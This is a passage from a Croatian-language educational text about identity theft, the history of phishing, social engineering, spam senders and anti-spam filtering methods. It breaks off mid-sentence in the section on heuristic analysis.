Sposobnost uvjeravanja da smo osoba za koju se predstavljamo je osnovni način na koji se danas u svijetu provodi trgovina. Identitet koristimo da bismo dokazali vlastitu autentičnost organizaciji s kojom poslujemo. Naš identitet se na Internetu sastoji od korisničkih imena, osobnih identifikacijskih brojeva (engl. Personal Identification Number), jedinstvenih matičnih brojeva, brojeva računa i dr. Identifikacija temeljena na taj način bazira se na pretpostavci da smo mi jedina osoba koja posjeduje te podatke. Međutim ta pretpostavka nije uvijek istinita i kriminalci se trude da dođu do tih podataka te ih zlouporabe. Danas se Internet koristi sve više i krađa identiteta može nanijeti velike posljedice onom kom je učinjena. Internet se koristi za sve oblike financijskih transakcija čime se daje velik motiv kriminalcima za krađu identiteta. Naš digitalni identitet se može uporabiti za otvaranje računa kreditnih kartica, podizanje kredita, provođenje financijskih transakcija, promjenu adresa i sličnih stvari. Nije to jedini način upotrebe našeg digitalnog identiteta. Postoji i tzv. crno tržište Interneta na kojem mnogi kriminalci međusobno preprodaju ukradeni identitet.

Najčešći oblik krađe identiteta je prijevara s kreditnim karticama. Kriminalci otvaraju lažni račun koristeći ukradene osobne podatke nekog korisnika. Tim računom kupuju mnoge vrijedne stvari i nakon što banka koja je izdala karticu blokira račun oni se jednostavno riješe kartice. Kupljenu robu preprodaju i na taj način zarađuju velike količine novca. Mnogi kriminalci ne biraju sredstva kako bi došli do digitalnih identiteta korisnika. Mnogi od njih surađuju s osobama koje imaju pristup do tih podataka i na taj način dolaze do njih.

Postoje dva načina kako ukrasti identitet. Jedan od njih je krađa informacija iz baze podataka banaka, ISP-ova, maloprodajnih mjesta, obračunskih ustanova i drugih mjesta gdje su pohranjene takve informacije. Postoje i slučajevi u kojima kriminalcima pomažu zaposlenici ili poslovni partneri koji imaju pristup podacima. U ovom načinu krađe korisnici čiji se identitet pokušava ukrasti mogu malo toga učiniti da to spriječe. Jedina stvar koju mogu učiniti je da češće provjeravaju stanje svog računa, nadziru svoje bankovne izvode i izvode kreditnih kartica kako bi uočili čudne transakcije. Drugi način krađe identiteta je da napadač izravno ukrade informacije ili prijevarom dođe do njih. U većini slučajeva ovaj način je puno jednostavnije izvesti stoga i većina kriminalaca odabire baš njega.

Pecanje (engl. phishing) je samo jedna od tehnika korištenih za krađu identiteta. To je tip zločina koji postoji dulje nego sam Internet. Krađa identiteta ‘‘nastaje kada netko koristi vaše osobne podatke bez dozvole kako bi počinio prijevaru ili neki drugi zločin’‘ (Američko Savezno trgovinsko povjerenstvo [8]). U izvještaju Saveznog trgovinskog povjerenstva u siječnju 2006. zabilježeno je 685 000 pritužbi na krađu identiteta i prijevaru korisnika. Dvije studije provedene u srpnju 2003. pokazuju da je oko 7 milijuna ljudi postalo žrtvama krađe identiteta u posljednjih 12 mjeseci, što znači 19 178 dnevno, 799 svaki sat. Ovi podaci su zbilja zabrinjavajući.

Slijedi kratak primjer phishing napada. U korisnikov poštanski sandučić e-pošte dolazi poruka koja izgleda kao da je poslana od korisnikove banke. U njoj piše da postoji problem s korisničkim računom koji se mora odmah riješiti. Takve poruke sadrže hiperveze koje vode do lažnih stranica koje izgledaju kao stranice banke koja se spominje i koje se nalaze na poslužiteljima čiji su vlasnici kriminalci. Na toj stranici traži se ispunjavanje nekog obrasca u kojem se traže osobni podaci. Ispunjavanjem tog obrasca korisnik daje pošiljatelju poruke svoje osobne podatke. Ta lokacija zapravo je lažna. Identična je stvarnoj stranici, ali se nalazi na poslužiteljima čiji su vlasnici kriminalci. Postoje i slučajevi u kojima je stranica legitimna, ali kriminalci izmanipliraju sustav adresiranja na Internetu tako da preusmjeri korisnika na njihovu lažnu lokaciju. Poruka koju je korisnik dobio nije poruka njegove banke nego podvala računalnih kriminalaca. Hiperveza na koju je kliknuo nije veza na njegovu banku već na lažnu stranicu koja je u vlasništvu kriminalaca koji na taj način može doći od osobnih podataka. Time mogu ukrasti novac, identitet ili prodavati osobne podatke drugim varalicama. Lažiranje poruka je vrlo jednostavno izvesti tako da je skoro nemoguće prepoznati je li riječ o pravoj ili lažnoj poruci. Ista stvar je i sa web stranicom.

Postoje i slučajevi u kojima kriminalci kradu poštu direktno iz poštanskog sandučića. Mnogi korisnici e-poštom dobivaju izvode za plaćanje računa kreditnim karticama na kojima se nalaze mnoge korisne informacije. Neki od njih šalju poštom lozinke, kodove, PIN-ove i slične povjerljive podatke. Ne samo da se te informacije mogu presresti mrežom nego se i kopije tih poruka nalaze u poslanim porukama, a mnogi korisnici ih niti ne obrišu. Postoji metoda koja se naziva kopanje po smeću (engl. dumpster diving). Mnogi korisnici u smeće bacaju razne vrste zanimljivih i potencijalno upotrebljivih informacija poput bankovnih izvoda ili kompanija za izdavanje kartica. Kriminalci mogu do tih informacija jednostavno doći kopanjem po smeću računala. Do sličnih informacija se može doći i s pokvarenih diskova koje mnogi samo bace ne brišući njihov sadržaj.

1.1 Povijest krađe identiteta

Riječ ‘‘phishing’‘ izvorno potječe od sličnosti sa ranim Internet kriminalom koji je koristio e-mail kao mamac za hvatanje lozinki i financijskih podataka iz mora Internet korisnika. ‘‘Ph’‘ u riječi najvjerojatnije je povezana sa nazivom ‘‘phreaking’‘ koja potječe od najranijih hakera koji su tim izrazom označavali zlouporabu telefonskih sustava. Izraz je stvoren 1996. godine od hakera koji su izveli napad na lozinke AOL-ovih (engl. America On Line) korisničkih računa. Prvo spominjanje izraza ‘‘phishing’‘ na Internetu bilo je u siječnju 1996. godine na hakerskoj interesnoj grupi (engl. newsgroup) naziva ‘‘alt.2600’‘. Pretpostavlja se da se izraz koristio i ranije u popularnom hakerskom newsletter-u ‘‘2600’‘.

It used to be that you could make a fake account on AOL so long as you had a credit

card generator. However, AOL became smart. Now they verify every card with a bank

after it is typed in. Does anyone know of a way to get an account other than phishing?

—mk590, ''AOL for free?'' alt.2600, January 28, 1996

Od 1996. hakirani računi su nazivani ‘‘phish’‘, a od 1997. ta se riječ aktivno koristi među hakerima. Postoje i primjeri gdje phisheri mijenjaju 10 ukradenih AOL korisničkih računa za dio hakiranog softvera ili ukradenu aplikaciju ili igricu.

The scam is called 'phishing' — as in fishing for your password, but spelled

differently — said Tatiana Gau, vice president of integrity assurance for the online

service.

—Ed Stansel, ‘‘Don't get caught by online 'phishers' angling for account information,’‘ Florida Times-Union, March 16, 1997

Tijekom vremena definicija izraza phishing je proširena i sada ne označava samo krađu korisničkog računa već i pristup do korisničkih osobnih i financijskih podataka. Ono što je originalno započelo kao varanje korisnika tako da odgovoraju na lažne e-mail poruke odavanjem lozinki i brojeva kreditne kartice, danas se proširilo u lažiranje web stranica, instalaciju Trojanskog konja (engl. Trojan horse), keystroke loggera ili programa koji spremaju izgled ekrana (engl. Screen capturer) te napada s čovjekom u sredini (engl. Man in the middle attack).

1.2 Društveno inženjerski faktori

‘‘The human factor is typically the most critical variable in information security systems. Even the best policies and technologies can be rendered completely ineffective if users do not take responsibility for safeguarding the information they control. ’‘

– Amit Yoran, Director of National Cyber Security Division of the Department of Homeland Security

U većini slučajeva napadači moraju natjerati žrtvu da hotimice obavi niz akcija koje će pružiti napadaču pristup povjerljivim podacima. Jedan od problema što postoji ovakav način varanja ljudi je društveni inženjering koji se oslanja na prirođeno povjerenje u ljude. Phishing poruke e-pošte snažno se oslanjaju na društveni inženjering jer prijevara propada ukoliko se za poruku ne vjeruje da dolazi od neke organizacije za koju se predstavlja. Ne samo da nasjedaju na poruke nego i vjeruju u ljude koji imaju određene društvene uloge, poput onih u uniformama, s iskaznicama ili u poslovnim odjelima. Kriminalci i stručnjaci za sigurnost koriste društveni inženjering kada pokušavaju provaliti na neku sigurnu lokaciju. Takve kriminalce nazivamo testeri za provalu. Ti testeri za provale motaju se naokolo po uredima da vide mogu li što pronaći. Mnogi od korisnika zapisuju lozinke, PIN-ove i slične stvari na vidljiva mjesta te se na taj način može lako doći do njih.

Popularni komunikacijski kanali su e-mail, web stranice, IRC i instant messenger usluge. U svim slučajevima pecači moraju oponašati povjerljiv izvor (npr. Bankovnu službu za pomoć korisnicima) kako bi im žrtve povjerovale i nasjele na podvalu. Do sada najuspješniji napadi su započinjali e-mail porukama gdje su pecači oponašali ovlaštena tijela (npr. lažiranjem izvora e-mail poruke i uključivanjem odgovarajućih korporacijskih logo oznaka). Primjerice žrtva dobiva e-mail navodno od support@mybank.com (adresa je lažirana) sa naslovom ‘‘Sigurnosna nadogradnja’‘. U tom e-mailu zahtjeva se od njih da slijede URL www.mybank-validate.info (domena pripada napadaču, ne banci) i upišu svoj PIN.

Pecači imaju mnogo kriminalnih metoda koje iskorištavaju društveno inženjerske faktore za varanje korisnika. U stvarnom primjeru koji slijedi primatelja e-maila uvjerava se da su njegovi bankovni podaci korišteni od neke treće osobe pri kupnji neke nedopuštene robe. Žrtvi se daje mogućnost da ih kontaktira e-mailom i pošalje svoje podatke ili da posjeti neku naizgled sigurnu web stranicu kako bi joj mogli otkazati transakciju.

Subject: Web Hosting - Receipt of Payment QdRvxrOeahwL9xaxdamLRAIe3NM1rL

Dear friend,

Thank you for your purchase!

This message is to inform you that your order has been received and will be processed shortly.

Your account is being processed for $79.85, for a 3 month term. You will receive an account setup confirmation within the next 24 hours with instructions on how to access your account. If you have any questions regarding this invoice, please feel free to contact us at tekriter.com. We appreciate your business and look forward to a great relationship!

Thank You, The Tekriter.com Team

ORDER SUMMARY

-------------

Web Hosting............. $29.85

Setup................... $30.00

Domain Registration..... $20.00

Sales Date.............. 08/04/2004

Domain.................. nashshanklin.com

Total Price............. $79.85

Card Type............... Visa

1.3 Prijevara 21. stoljeća

Dobivanjem pristupa tuđim osobnim podacima i lažnim predstavljanjem, kriminalci su mogli obavljati kriminalne radnje u potpunoj anonimnosti. Danas, u 21. stoljeću krađa elektroničkog identiteta nikad nije bila lakša. Ono što je izvorno započelo kao zlonamjeran hobi iskorištavanjem najpopularnijeg komunikacijskog kanala na Internetu profesionalni kriminalci koriste za slanje lažnih poruka pokušavajući namamiti žrtve u zamke napravljene za krađu njihovog elektroničkog identiteta. Iza naziva ‘‘phishing’‘ krije se proces varanja korisnika i korištenje njihovih povjerljivih informacija u kriminalne svrhe. Svaki online posao ima pecače koji se skrivaju iza njihova imena i pokušavaju prevariti njihove korisnike. Broj phishing napada i njihova sofisticiranost raste svaki mjesec. Količina poruka koja se šalje broji se u milijunima. Pecači mogu lako prevariti korisnike s namjerom otkrivanja osobnih, financijskih podataka te lozinki. Dok je neželjena pošta bila dosadni mail uznemirujućeg sadržaja, phishing ima potencijal nanijeti ozbiljne podatkovne gubitke i gubitke uslijed neovlaštenih novčanih transakcija. Nedavna studija je pokazala da je 57 milijuna američkih korisnika Interneta primilo elektroničku poštu vezanu uz phishing te oko 1.7 milijuna njih su otkrili svoje osobne informacije ne prepoznajući lažne poruke. Studije radne grupe koja se bavi phishing napadima (engl. Anti Phishing Working Group – APWG) [1] su zaključile da je oko 5% poslanih poruka uspješnih u svojim namjerama da od korisnika izvuku osobne podatke. Osim protokola za slanje elektroničke pošte (engl. Simple mail transfer protocol – SMTP) čiji su sigurnosni propusti iskorišteni za phishing napade u porastu je i broj ostalih komunikacijskih kanala koji se također koriste za istu namjenu. Kako se budu propusti unutar SMTP protokola rješavali, povećavat će se broj ostalih komunikacijskih kanala koji se koriste za tu svrhu. Dok su većine velikih financijskih organizacija poduzele odgovarajuće korake s ciljem povećanja svijesti o opasnosti svojim klijentima većina ostalih organizacija učinila je vrlo malo za borbu protiv phishinga.

2 Neželjena elektronička pošta

Neželjena elektronička pošta (engl. spam) su poruke koje masovno i bez dopuštenja šalje organizacija ili osoba s kojom primatelj nema nikakve veze. Tipična neželjena poruka najčešće je reklama nekog proizvoda ili usluge. Takve poruke šalju se na tisuće pa i milijune e-mail adresa. Ako na nju odgovori i najmanji postotak primatelja, pošiljatelji neželjene pošte na tome zarađuju i dobivaju poticaj da šalju još više takve neželjene pošte. Prevaranti šalju neželjenu poštu u nadi da će primatelja uvući u razrađene sheme prijevare ili od njega saznati povjerljive osobne podatke.

Neželjena elektronička pošta poznata je i pod skraćenicom UCE (engl. Unsolicated comerical e-mail), odnosno neželjena komercijalna pošta. Taj naziv najčešće se koristi u vladinim agencijama, primjerice u Američkom Saveznom povjerenstvu za trgovinu. Nema sva neželjena pošta uvijek komercijalnu pozadinu. Njezin sadržaj može biti političke ili vjerske prirode ili jednostavno zlonamjeran. Mnogi virusi započinju kao neželjena pošta. Pecanje započinje također s krivotvorenim e-mail porukama pomoću kojih se od primatelja žele saznati brojevi kreditnih kartica ili zaporke.

Ne može se sva bezvrijedna pošta smatrati neželjenom. Ukoliko se korisnik pretplati na Internet uslugu svoje banke, a banka mu svaki dan pošalje poruku u kojoj reklamira svoje usluge i proizvode, to ga može živcirati, ali se ne može svrstati pod neželjenu poštu. Ali, ukoliko banka proslijedi njegovu e-mail adresu nekoj drugoj tvrtki i ona počne slati bezvrijednu poštu, to se može smatrati neželjenom poštom. Pojednostavljeno; ako ne postoji način jednostavne odjave s popisa za slanje onda se sigurno radi o neželjenoj pošti.

Glavni razlog zbog kojeg postoji neželjena pošta jest novac. Slanje neželjene pošte sa reklamom stoji vrlo malo, tako da broj primatelja koji prihvati reklamu ne mora biti velik kako bi ona postala financijski izuzetno unosna. Pošiljatelji pokušavaju zaraditi i ne mare što se veliki broj ljudi uznemiri kad vidi pun pretinac reklama.

2.1 Pošiljatelji neželjene elektroničke pošte

Pošiljatelji neželjene pošte koriste sustav slanja elektroničke pošte preko Interneta koji omogućuje slanje neograničenog broja poruka na velik broj adresa i sve gotovo besplatno. Zbog velike količine poslanih poruka nije potreban velik postotak primatelja koji nasjedne kako bi pošiljatelj imao zaradu. Zbog vrlo niske cijene slanja poruke pošiljatelj se ne mora zabrinjavati ukoliko poruku pošalje na pogrešnu adresu, što nije slučaj u fizičkom svijetu gdje se plaća svaka pojedinačna pošiljka. Adrese se sakupljaju sa svih dostupnih izvora, Chat soba, web stranica i diskusijskih grupa. Pošiljatelji međusobno preprodaju sakupljene adrese. Iz ovih razloga moramo biti vrlo oprezni i paziti gdje sve stavljamo svoju adresu elektroničke pošte.

Danas su razvijeni alati koji sami sakupljaju adrese. Na Internetu su dostupni programi takozvani ‘‘pauci’‘ koji pregledavaju web stranice u potrazi za adresama te slijede hiperveze na stranici kako bi došli na sljedeću stranicu i tako nastavili postupak. Spameri i tvrtke koje prodaju proizvode spamerima koriste ih za sakupljanje adresa. Postoje i alati koji sakupljaju adrese elektroničke pošte i korisnička imena i u Chat sobama i diskusijskim grupama. Osim ovog načina sakupljanja adresa koriste se i takozvani napad po rječniku (engl. dictionary attack), poznat i kao žetva imenika (engl. directory harvesting). Koriste se brutalna sila za dolaženje do adresa. Spamer kreira program koji ciklički prolazi kroz sve varijante uobičajenih imena, odabire određenu domenu. Na taj se način generira tisuće pa i milijune adresa koje se šalju u nadi da će se pogoditi dovoljno ispravnih kombinacija. Problem ovog napada je taj što velika količina poslanih poruka može dovesti do pretrpavanja e-mail poslužitelja te na taj način spriječiti slanje legitimne pošte.

Zbog zabranjenog slanja masovne pošte pošiljatelji koriste mnoge trikove da sakriju i promijene mjesto i identitet pomoću lažnih zaglavlja poruka i sličnih trikova. Oni smišljaju svakakve metode da sakriju izvor poruke jer su davatelji usluga brzi u blokiranju izvora spama, a spameri mogu završiti u zatvoru ukoliko ih se uhvati i optuži. Za slanje e-mail-a koristi se SMTP (engl. Simple mail transfer protocol). Taj protokol oslanja se na dvije vrste zaglavlja pri isporuci poruka. Postoji zaglavlje omotnice i zaglavlje poruke. Zaglavlje omotnice sadrži podatke koji omogućuju e-mail poslužiteljima da znaju kuda trebaju poštu isporučiti. Svaki poslužitelj kroz koji poruka prolazi dodaje svoje zaglavlje. U tom se zaglavlju može vidjeti put koji je prolazila pošta poslana na primateljevu adresu. Međutim spameri mogu postaviti lažna zaglavlja i time sakriti svoje tragove. Zaglavlje poruke sadrži između ostalog retke ‘‘To: ‘‘ i ‘‘From:’‘ koji se vide u programu za pregledavanje pošte i u kojima je napisano tko šalje poštu i za koga je ta pošta namjenjena. Ta zaglavlja je vrlo lako krivotvoriti.

Postoje i programi pomoću kojih se zaražena računala pretvaraju u poslužitelje za masovno slanje neželjene pošte. Takva računala nazivamo spam Proxy. To može biti neki e-mail poslužitelj koji je krivo konfiguriran ili računalo koje je zaraženo Trojanskim konjem koji omogućava spamerima potpunu kontrolu računala. Računala sa širokopojasnom vezom vrlo su popularne mete za spam Proxy napade zbog svoje brzine i stalne veze na Internet. Oni su spamerima vrlo vrijedni jer sakrivaju pravi izvor pošte i kad to računalo dođe na popis crne liste, spameri ga jednostavno odbace i pronađu novo.

Neki od spamera koriste društveni inženjering kako bi prevarili ljude. Njima je želja da im poruke budu otvorene te smišljaju način kako da navedu osobu da poruku otvori. U tu svrhu koriste atraktivne ili često nejasne naslove. Još jedan oblik neželjene pošte koji uznemirava korisnike su pornografske fotografije koje se pojavljuju u porukama. Ne samo da uznemiravaju korisnike svojim sadržajem nego one i potvrđuju aktivnost e-mail adrese. Većina tih slika se ne nalazi u samoj poruci nego samo njihove reference. Program za rad s e-poštom preuzima slike s poslužitelja neželjene pošte. Tim procesom program potvrđuje aktivnost adrese i šalje IP adresu računala. Stoga je korisno u svom programu za rad s poštom isključiti prikaz slika, što je u većini današnjih programa za rad s poštom već isključeno. Spameri postavljaju takove signale u spam poruke kako bi saznali je li poruka otvorena. To im pomaže da otkriju adrese koje se koriste. Te sličice ne moraju biti velike, veličine do 1 pixela tako da korisnik ni ne zna da se u pošti nalazi slika.

Kao što je već spomenuto, glavni motiv svega ovoga je novac stoga mnoge tvrtke unajmljuju pojedince za reklamiranje njihovih proizvoda i plaćaju im za to. Za sad ne postoji način da se spriječi masovno slanje pošte stoga je jedino rješenje pokušaj da se slanje svede na minimum, odnosno da pazimo da naša adresa ne dođe na popis za slanje. Znači treba biti oprezan kome i kako dajemo svoju e-mail adresu.

Pošiljatelji osim prikupljanja adresa koriste i trikove pogađanja adresa. Većina ljudi pri odabiru e-mail adresa uzimaju nekreativna korisnička imena čime olakšavaju njihovo pogađanje. Sigurno se svakom dogodilo da pri odabiru korisničkog imena dobije poruku da je to ime već zauzeto što pokazuje njegovu kreativnost. Pri odabiru korisničkog imena treba odabrati neko neobično ime. Primjeri nekih loših korisničkih imena su: ‘‘ime.prezime’‘, ‘‘ime1985’‘, ‘‘prezime1111’‘ i sl. Mnogo bolji odabiri su primjerice ‘‘2ime4521’‘ ili ‘‘i3k5678’‘ ili ‘‘markovolisunce’‘ koja nemaju neko očito značenje. Također mnoga od korisničkih imena koja se ne koriste duže vrijeme budu zastarjela i ponovno ih mogu koristiti novi korisnici. Postoji vjerojatnost da je takvo korisničko ime već na popisu za slanje masovnih e-mail poruka i odabirom takvog imena korisnik se automatski nalazi na popisu za slanje. Kada pošiljatelj pošte odabere korisničko ime na njega se dodaje proizvoljna domena davatelja Internet usluga. Budući da velik broj korisnika otvara korisničko ime kod poznatih davatelja usluga pošiljatelji neželjene pošte biraju baš njih jer tako postoji veća vjerojatnost u pogađanje adrese. Ukoliko se odabere manje poznati davatelj, smanjuje se vjerojatnost pogađanja e-mail adrese. Također može se razmotriti mogućnost korištenja sporednih adresa elektroničke pošte. Primarnu adresu treba dati samo ljudima s povjerenjem, a sporednu koristiti za sve ostalo.

Mnogi davatelji poput google.com, yahoo.com, hotmail omogućuju otvaranje besplatne adrese koja može poslužiti u te svrhe. Može se razmotriti mogućnost otvaranja većeg broja sporednih adresa te korištenje pojedine na određenim mjestima. Kod davanja e-mail adrese na web stranicama korisno je provjeriti postoji li na stranici tekst o tajnosti podataka, tj. za što će se koristiti adresa koju upisujemo. Ukoliko ne piše ili je nejasno definiran u tom slučaju je bolje odustati od usluge koja se nudi na toj stranici ili pak dati sporednu adresu. Na nekim stranicama postoji mogućnost označavanja želimo li korisnik da se na njegovu adresu šalju poruke te tvrtke ili nekih njezinih partnera. Većina tih polja je napravljena da se zbuni korisnika. Na nekima se traži označavanje ako se ne želi slanje dok na drugima suprotno. Ukoliko se krivo označi, adresa će postat mjesto slanja velikih količina neželjene pošte.

Objava adrese na web stranicama također je mjesto gdje se ona može vrlo lako pokupiti. Ukoliko želimo da naša adresa bude objavljena na stranici postoji nekoliko trikova za njeno maskiranje. Jedan od načina je da umjesto napisane adrese umetnemo sliku na kojoj piše adresa. To je vrlo jednostavno napraviti, a time smo spriječili njeno automatsko sakupljanje. Drugi, malo složeniji način jest da za komunikaciju koristimo obrazac za elektroničku poštu u koji pošiljatelj upisuje tekst, ime i svoju adresu te na taj način šalje poruku. Time se omogućava da naša adresa bude korištena samo u željene svrhe. Još jedno mjesto gdje se mora paziti kod korištenja naših adresa su diskusijske grupe (engl. usenet groups) i forumi. Diskusijske grupe su usluga na Internetu koja omogućuje razmjenu informacija i mišljenja s drugim korisnicima te grupe. Do adresa je vrlo lako doći pošto se u svakoj poruci u diskusijskoj grupi nalazi adresa njenog pošiljatelja. Kod slanja poruka svakako treba izbjegavati korištenje primarne adrese e-pošte. Umjesto nje bolje je upotrijebiti sporednu adresu koju prije toga treba prikriti. Prikrivanje adrese je vrlo jednostavno. Npr. adresa ime.prezime@domena.hr može biti prikrivena sa ‘‘ime tocka prezime at domena tocka hr’‘. Osoba koja želi poslati poruku na tu adresu može iz toga jednostavno doći do prave adrese. Iste mjere opreza potrebno je koristiti i kod slanja poruka na diskusijske forume na webu (engl. message boards). Kod prijave svakako treba označiti skrivanje adrese e-pošte jer će u protivnom ona biti pokupljena robotom za sakupljanje adresa. Još jedno mjesto za oprez su popisi za slanje (engl. mailing lists) jer mnogi od njih objavljuju arhive poruka na web stranicama tako da ih roboti mogu jednostavno pokupiti. Kod komuniciranja u pričaonicama (engl. Chat rooms) također postoje roboti koji prikupljaju adrese e-pošte i dodaju ih na popise. Najbolji način zaštite jest da se ne koristi isto korisničko ime u pričaonici kao i ono od elektroničke pošte.

Slika 2.1 Primjer maskiranja e-mail adrese richard.levin@yale.edu

Primjenjujući navedene savjete može se spriječiti da naša adresa dođe na popis za slanje. No, uz sav taj trud postoji mogućnost da se u pretincu pronađe neželjena pošta. Ukoliko korisnik primi neželjenu poštu trebala bi postojati mogućnost jednostavnog klika na hipervezu u poruci i da bude uklonjen s popisa za slanje. Takva situacija nije u stvarnom svijetu. Pošiljateljima je u cilju da se pokuša ukloniti adresa sa popisa za slanje. Stoga oni stavljaju hiperveze kako bi korisnika zavarali da se klikom na tu hipervezu problem rješava. Odgovaranjem na poruku ili pritiskanjem hiperveze pošiljatelju se daje do znanja da je adresa na koju je poslao poruku valjana i da se redovito provjerava. Uz posjećivanje lažne hiperveze za odjavljivanje velika je vjerojatnost zaraze računala virusom ili špijunskim programom. No nije sva pošta koja stigne ujedno i neželjena. Postoji velik broj osoba i agencija koje se legitimno bave marketingom i šalju e-mail poruke u svrhu oglašavanja svojih proizvoda i ukoliko korisnik želi uklonit će ga s popisa za slanje. Nakon svega ovoga jasno je da se na neželjenu poštu ne smije odgovarati ili kupovati nešto što se u njoj reklamira. Kupnjom ili odgovaranjem na poštu korisnik postaje obilježeni kao meta za primanje neželjene pošte. Neželjenu poštu potrebno je potpuno ignorirati. Razlog njenog postojanja je upravo taj što postoje korisnici koji na nju nasjedaju i odgovaraju. Ona bi nestala ukoliko se pošiljateljima ne bi isplatilo i ukoliko korisnici ne bi na nju nasjedali. Bez obzira koliko poruka izgleda legitimno postoji velika vjerojatnost da se radi o prijevari.

2.2 Anti-spam filtri

Anti-spam filtri uspoređuju poruku s bazom neželjenih poruka kako bi ustanovi dali se u poruka u nekoj mjeri poklapa s nekom poznatom spam porukom. Zaglavlje poruke također sadrži informacije koje mogu pomoći u filtriranju poruka e-pošte. U njemu se nalaze podaci o isporuci poruke. Filtar pregledava zaglavlje u potrazi za lažnim ili nedosljednim zaglavljima. Sve se svodi na međusobno nadmudrivanje i korištenje raznoraznih trikova za zavaravanje.

Dešava se da neke od legitimnih poruka završavaju kao neželjene. Jedan od razloga je primjerice prijava korisnika na nekoj stranici sa željom da prima obavijesti. Filter za to ne zna i tu poštu će vrlo vjerojatno svrstavati pod neželjenu. Naravno postoji mogućnost da mu se eksplicitno navedu izvori od kojih se želi primati pošta. Poruke se filtriraju na temelju vjerojatnosti. Ukoliko je analiziranje prestrogo, legitimna poruka bit će označena kao neželjena. Ukoliko je pak analiziranje preblago većina neželjenih poruka neće biti filtrirana i pretinac će biti zatrpan neželjenim porukama. Većina filtara sadrži opciju kojom se može namjestiti razinu strogosti.

2.3 Metode filtriranja neželjene pošte

Filtar neželjene pošte kao što mu ime govori pregledava dolaznu poštu i poruke za koje misli da su neželjene smješta u posebnu mapu ili briše. Ostale poruke stavlja u dolazni pretinac. Korisnik potom može pogledati je li alat dobro razvrstao poruke. Njegov posao nije jednostavan jer postoji velik broj trikova koje koriste pošiljatelji pošte kako bi ga zavarali. Također proizvođači takvih alata smišljaju i implementiraju nove metode razvrstavanja pošte kako bi njihov alat uspješnije djelovao. Filtar dok radi, uči i pamti od koga dobivamo poštu te u kojem formatu tako da se njegova učinkovitost s vremenom poboljšava. Filtri koji se koriste za pregledavanje dolazne pošte koriste sofisticirane algoritme kako bi što uspješnije klasificirali poruke koje spadaju pod neželjene. Koriste se algoritmi koji se baziraju na vjerojatnosti kojom utvrđuju je li pošta neželjena. Ta vjerojatnost se računa iz većeg broja parametara ovisno o proizvođaču filtra neželjene pošte.

Vremenom su metode filtriranja neželjene pošte iz jednostavnih poput onih koji filtriraju poštu pretraživanjem po ključnim riječima napredovale do složenih statičkih analitičkih alata koji koriste umjetnu inteligenciju u svom radu. Rezultat toga je velik broja alata koji koriste različite metode u svom radu. Svi ti alati su automatizirani odnosno sami filtriraju dolaznu poštu u neželjenu ili spam te željenu ili ham. Ham je naziv za poruke koje su željene. Skoro svaki od tih alata ne radu sa sto postotnom točnošću već griješe. Označavanje poželjne pošte kao spam poruke naziva se lažno pozitivno (engl. false positive). Posljedica lažnog pozitivnog označavanja je da se poruka koja nije spam neće nikada isporučiti. Označavanje spam poruke kao poželjne naziva se lažno negativno (engl. false negative). Posljedica pak lažnog negativnog označavanja je da će spam poruke dospjeti u poštanski sandučić. Metode koje se koriste daju se četo podesiti da se postigne ravnoteža između maksimiziranja detekcije spam poruka i minimiziranja pogrešno klasificiranih poruka. Neke metode filtriranja neželjene pošte uključuju:

· Filtre sadržaja ili pretraživanje po ključnoj riječi

· Crne liste (engl. blacklist)

· Bijele liste (engl. white list)

· Metoda Heurističke analize

· Potpisi spama

· Izazov/odgovor

· Bayesiansko filtriranje

· Filtriranje reputacije

2.3.1 Filtri sadržaja ili pretraživanje po ključnoj riječi

Kao što samo ime govori ova metoda filtriranja neželjene pošte skenira redak po redak u nadi da će pronaći neku od riječi ili kombinaciju riječi koje će poruku identificirati kao neželjenu. To je jedna od najstarijih i najjednostavnijih metoda borbe protiv spama, time i najmanje efikasna. Ova metoda je metoda koju spameri vrlo jednostavno prevare. Mnogi spam alati mogu namjerno pogrešno napisati neku riječ kako bi zavarali filtar, a da tu riječ čovjek i dalje razumije. Ukoliko se u poruci reklamira primjerice Viagra u poruci može biti napisano V1agra, Vi@gra, Viagr@ ili \/iagra. Na taj način pokušavaju nadmudriti filtar. Postoji vrlo velik broj kombinacija koje se mogu koristiti za pisanje samo jedne od riječi. No, većina boljih filtara koristi mogućnost pronalaženja ovakvih kombinacija riječi. Postoji još nekoliko stvari koje identificiraju neželjene poruke. Hiperveza koju većina takvih poruka sadrži ili slike koje poruka sadrži su određena vrsta pokazatelja dali je poruka neželjena. spam alati koriste i druge trikove poput umetanja HTML komentara između slova u riječima. Dok HTML komentar nije vidljiv osobi koja čita riječ on zavarava filtar.

2.3.2 Crne lista

Crna lista je lista na kojoj se nalazi popis IP adresa ili domena koje su identificirane kao pošiljatelji neželjene pošte. Ukoliko se adresa koju uspoređujemo nalazi na toj listi poruka se odbacuje ili označava kao neželjena pošta. Dobro održavana crna lista može biti vrlo efikasna pri blokiranju poznatih izvora spama. Najpoznatija crna lista je ‘‘Mail Abuse Prevention System’‘ (MAPS) koja se nalazi na adresi www.mailabuse.com . Njezin popis ‘‘Realtime Blackhole List’‘ (RBL) je baza podataka IP adresa poznatih e-mail poslužitelja koji su znani kao prijateljski ili u najmanju ruku neutralni za spamere. Druge poznate crne liste održavaju ‘‘SpamCop’‘na adresi www.spamcop.net i ‘‘SpamHaus’‘na adresi www.spamhaus.org . Te liste koriste davatelji usluga, tvrtke i svatko tko ima poslužitelj e-pošte. Mnogi davatelji Internet usluge koriste ove ili druge crne liste kao dio svojih usluga filtriranja spama. Ovaj način filtriranja nije uvijek učinkovit pošto spameri stalno mijenjaju IP adresu i domene pa crna lista može ubrzo postati nevažeća. Drugi problem što neka od kompromitiranih računala poslužitelja koja se koriste za slanje spama mogu imati velikih problema da se izbrišu s liste jednom kad se riješi problem. Za to vrijeme će svaka organizacija koja koristi tu crnu listu blokirati njenu e-poštu.

2.3.3 Bijela lista

Bijela lista je popis provjerenih adresa e-pošte ili domena. Bijele liste vrlo su točne i nadopunjuju crne liste pružanjem granularne kontrole. Dok crna lista može blokirati glavnu domenu, bijela lista može otvarati dijelove te domene za koje se zna da šalju poželjnu poštu. Bijele liste su korisne i zato jer osiguravaju isporuku pošte s provjerenih izvora i omogućuju porukama da zaobiđu druge metode otkrivanja spama, štedeći vrijeme i procesorsku snagu. Njihova mana je ta što ih je potrebno stalno održavati kako se adrese ili domene uklanjaju ili dodaju.

2.3.4 Heurističke analize

Ovaj način filtriranja poruka temelji se na umjetnoj inteligenciji. Nad dolaznom porukom

